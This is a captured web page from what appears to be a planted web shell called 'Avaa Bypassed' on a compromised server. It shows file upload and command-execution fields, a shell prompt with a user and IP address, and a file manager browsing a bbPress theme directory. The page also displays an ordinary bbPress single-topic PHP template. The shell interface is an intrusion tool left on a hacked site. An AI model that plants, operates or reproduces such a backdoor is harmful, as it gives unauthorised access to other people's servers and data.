[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@3.139.236.144: ~ $
<?php

/**
 * Single Topic Content Part
 *
 * @package bbPress
 * @subpackage Theme
 */

?>

<div id="bbpress-forums">

	<?php do_action( 'bbp_template_before_single_topic' ); ?>

	<?php if ( post_password_required() ) : ?>

		<?php bbp_get_template_part( 'form', 'protected' ); ?>

	<?php else : ?>

		<?php bbp_topic_tag_list(); ?>

		<?php bbp_single_topic_description(); ?>

		<?php  bbp_topic_subscription_link(); ?>

		<?php  bbp_topic_favorite_link();?>

		<?php if ( bbp_show_lead_topic() ) : ?>

			<?php bbp_get_template_part( 'content', 'single-topic-lead' ); ?>

		<?php endif; ?>

		<?php if ( bbp_has_replies() ) : ?>

			<?php bbp_get_template_part( 'pagination', 'replies' ); ?>

			<?php bbp_get_template_part( 'loop',       'replies' ); ?>

			<?php bbp_get_template_part( 'pagination', 'replies' ); ?>

		<?php endif; ?>

		<?php bbp_get_template_part( 'form', 'reply' ); ?>

	<?php endif; ?>

	<?php do_action( 'bbp_template_after_single_topic' ); ?>

</div>

Filemanager

Name Type Size Permission Actions
content-archive-forum.php File 642 B 0644
content-archive-topic.php File 798 B 0644
content-search.php File 733 B 0644
content-single-forum.php File 1.08 KB 0644
content-single-reply.php File 446 B 0644
content-single-topic-lead.php File 2.36 KB 0644
content-single-topic.php File 979 B 0644
content-single-user.php File 939 B 0644
content-single-view.php File 550 B 0644
content-statistics.php File 1.8 KB 0644
content-topic-tag-edit.php File 349 B 0644
form-reply.php File 6.2 KB 0644
form-search.php File 721 B 0644
form-topic.php File 7.76 KB 0644